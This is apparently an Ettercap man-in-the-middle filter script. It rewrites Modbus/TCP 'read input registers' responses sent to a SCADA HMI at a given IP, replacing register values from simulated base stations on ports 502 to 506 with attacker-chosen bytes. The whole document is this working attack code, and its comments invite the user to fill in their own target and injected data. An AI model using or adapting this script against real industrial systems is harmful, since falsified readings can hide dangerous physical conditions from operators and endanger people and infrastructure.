# set ip.dst to ip address of your SCADA (IP OF hmi)
if (ip.dst == '192.168.133.193') { 
    # set tcp.src to the port of each base station simulation
    # or add cases if they are on different IPs
    if (tcp.src == 502 || tcp.src == 503 || tcp.src == 504 || tcp.src == 505 || tcp.src == 506) {
        # DATA.data + 7 is ModBus function code
        if (DATA.data + 7 == "\x04") {
            # set to data you want to write
            DATA.data + 9 = "\x00\x00\x00\x00\x00\x00\x15\xB3";
        }
    }
}
